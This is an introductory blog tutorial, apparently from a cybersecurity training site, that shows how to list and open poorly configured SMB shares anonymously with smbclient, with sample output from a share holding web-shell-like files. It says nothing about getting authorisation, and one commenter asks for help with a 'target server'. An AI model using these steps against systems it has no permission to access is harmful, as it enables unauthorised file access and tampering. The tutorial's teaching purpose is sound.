How to Exploit a Poorly Configured SMB

August 1, 2016 | Views: 43316

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

snowboard trip

What’s an SMB?

SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.

SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that’s incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.

Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

(Samba.org)

 

Exploiting Badly Configured SMB’S

What you’ll need:

  1. A machine that can run smbclient command
  2. A vulnerable/poorly configured SMB machine (remote or local)
  3. SMB PORT: 445

Computer network

Steps:
Check Sharenames

To view smb share names use the command:
smbclient -L 192.168.25.1 -N
(192.168.25.1 = ip of vulnerable smb)

You’ll get something like this:

`WARNING: The “syslog” option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

Sharename Type Comment
——— —- ——-
arquivos     Disk
IPC$           IPC IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

Server Comment
——— ——-
SAMBA Samba Server 4.3.9-Ubuntu

Workgroup Master
——— ——-
COMPUTACAO SAMBA
`
After doing that, you’ll need to pick a Sharename. For example “arquivos” or “IPC$”. I highly recommend you to pick one that doesn’t have the symbol “$”, because it’s easy to get one with permissions.

In this case, I’m going to pick “arquivos” as Sharename.

Finally:

smbclient //192.168.25.1/arquivos -N

And, that’s pretty much it…
Now, if your host is totally vulnerable, you can upload files, download files, etc.

EX:
`
WARNING: The “syslog” option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu] smb: > ls
. D 0 Tue Jul 19 09:12:48 2016
.. D 0 Fri May 22 09:25:21 2015
html D 0 Fri Jul 15 03:48:38 2016
codeigniter D 0 Fri Jul 3 17:00:48 2015
serverconfig.php A 100402 Fri Jul 15 03:48:46 2016
phpmyadmin D 0 Fri May 22 16:28:47 2015
khy AR 0 Tue Jul 19 09:12:48 2016
cgitelnet1 D 0 Fri Jul 15 05:40:41 2016
supp1.1 D 0 Tue Jul 7 19:35:09 2015
index.html N 142 Tue May 10 16:30:59 2016
teste.php A 21 Fri May 22 11:56:35 2015
enxjdf.exe N 571074 Mon Apr 14 16:06:33 2008
cherno.php N 210752 Fri Jul 15 05:13:46 2016

151380148 blocks of size 1024. 132224492 blocks available
smb: >
`

You can view all the smbclient commands by typing “?”

`smb: > ?
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del dir du
echo exit get getfacl geteas
hardlink help history iosize lcd
link lock lowercase ls l
mask md mget mkdir more
mput newer notify open posix
posix_encrypt posix_open posix_mkdir posix_rmdir posix_unlink
print prompt put pwd q
queue quit readlink rd recurse
reget rename reput rm rmdir
showacls setea setmode scopy stat
symlink tar tarmode timeout translate
unlock volume vuid wdel logon
listconnect showconnect tcon tdis tid
logoff .. !
`


I made a Python script that does all the hard work; if you want, you can get it here.

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
6 Comments
  1. Please i have a target server that allows only anonymous login it doesn’t list any share when scanning

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel